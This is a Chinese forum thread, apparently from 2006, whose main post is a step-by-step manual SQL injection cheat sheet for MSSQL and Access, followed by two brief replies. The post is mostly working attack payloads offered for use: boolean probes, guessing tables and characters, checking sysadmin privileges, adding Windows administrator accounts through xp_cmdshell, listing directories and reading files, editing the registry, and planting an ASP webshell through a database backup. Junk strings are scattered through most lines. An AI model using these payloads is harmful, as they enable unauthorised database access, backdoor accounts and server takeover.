社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4063阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ,8^QV3  
  2.初步判断是否是mssql ;and user>0 u^Sa{Jk=  
qe{:9  
  3.注入参数是字符'and [查询条件] and ''=' M!j: 2dT"  
_cw~N p  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' /3mt=1/~{B  
oYn|>`+6:y  
  5.判断数据库系统 Kk?C   
;('(Yn7~  
  ;and (select count(*) from sysobjects)>0 mssql \sZT[42  
+M^+qt;]V  
  ;and (select count(*) from msysobjects)>0 access 3+>;$  
+P5\N,,7R  
%SHgXd#X  
v62M8r,Y  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 dNg5#?mzT5  
?@uyqi~:U  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 C0> Z<z  
'l7ey3B%  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4gkaCk{]  
U.,_zEbx,  
  9.(1)猜字段的ascii值(access) 6< T@\E  
y/(60H,{{  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ;VI/iwg  
mufJ@YS#  
  (2)猜字段的ascii值(mssql) 7j22KQ|EX^  
|k ]{WCD]  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 S(\<@S&  
w#Di  
  10.测试权限结构(mssql) `BOG e;pl  
z&a>cjt_;  
8,^2'dK34  
MaS"V`NI  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- $pLJtQ  
z:7 i@m  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- e!hy,O{Pw  
zOfMKrRG  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- H0P:t(<Gt  
7)Y0D@wg  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- gf\F%VmSN  
FT$Z8  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 7i@vj7K  
9ER!K  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- A0f98 ?j^  
Uxl7O4J@H  
  ;and 1=(select IS_MEMBER('db_owner'));-- A<$w }Fy;  
de<T5/  
lK 0pr  
3 J!J#  
  11.添加mssql和系统的帐户 KdTDBC  
t<DZW#  
  ;exec master.dbo.sp_addlogin username;-- (- QvlpZ  
  ;exec master.dbo.sp_password null,username,password;-- [d^ [Y:I'\  
)'3V4Z&  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- r-aCa/4y!  
$(=0J*ND"  
  ;exec master.dbo.xp_cmdshell 'net user username password xb22 :  
EK=PY  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7q;wj~  
Q]7}" B&  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 1>IA9]D7  
z3mo2e  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- S+* g  
ZK p9k6  
T5gL  
EjDr   
  12.(1)遍历目录 u P&<  
Mr6q7  
  ;create table dirs(paths varchar(100), id int) l?Qbwv}  
HV}*}Ty  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' OB5t+_ s  
4;D>s8dgG  
  ;and (select top 1 paths from dirs)>0 !bGMVw6_  
__OH gp 1  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *< ?~  
y|Vwy4tK9  
PC55A1(T  
=`W#R  
  (2)遍历目录 nKu)j3o`  
Vu1swq)l  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :)g}x&A^$  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ,GTIpPj  
mDX UF~G[  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *:tfz*FG$G  
*Al`QEW  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Q@aDa8Z  
:|TQi9L$rj  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 \{K~x@`  
^9`S`Bhp  
S #6:!  
iQ#dWxw4  
  13.mssql中的存储过程 $s,Az_bs  
W'3~vQF  
  xp_regenumvalues 注册表根键, 子键 4E 32DG*  
<C{uodFll  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 dR@XwEpP  
bb}$7v`G  
  xp_regread 根键,子键,键值名 7:$zSj# y  
&++tp5  
  ;exec xp_regread  <R.Ipyt.  
2}xvM"k=k  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Wa!}$q+  
\yKYBfp-p  
  xp_regwrite 根键,子键, 值名, 值类型, 值 ?j|i|WUD  
+ )lkHv$R  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 DNmP>~  
( *Fb/  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 2'T uS?  
Zv^n  
  xp_regdeletevalue 根键,子键,值名 =Yt)b/0b9  
xI( t!aYp  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >yr1wVS  
M'>8P6O  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 7rSads  
6 ~.{~+Bd  
B82SAV/O  
j~C-T%kYa  
  14.mssql的backup创建webshell Zy&?.d[z  
8L _]_  
  use model M%"{OHj!o  
^\3r}kJ0Lp  
  create table cmd(str image); 7AuzGA0y  
1%Su~Z"W>  
  insert into cmd(str) values (''); |Q*OA  
7I;A5f  
  backup database model to disk='c:\l.asp'; eccJt  
,f)#&}x*2+  
0jmPj   
Ro :)N:C  
  15.mssql内置函数 vH)V\V  
`Ti?hQm/  
  ;and (select @@version)>0 获得Windows的版本号 y@2$sK3K  
J[{?Y'RUM  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa c#<p44>U  
<&MY/vV  
  ;and (select user_name())>0 爆当前系统的连接用户 F*J@OY8i  
z( ^ r  
  ;and (select db_name())>0 得到当前连接的数据库 8/BWe ;4  
D5$| vv1  
'Fr"96C$  
h;JO"J@H  
  16.简洁的webshell H%G|8,4  
hyVBQhk  
  use model %pBc]n@_  
Z>(K|3_  
  create table cmd(str image); Xcw 6mpLt  
NGL,j\(~7  
  insert into cmd(str) values (''); }zy h!  
LyNLz m5  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八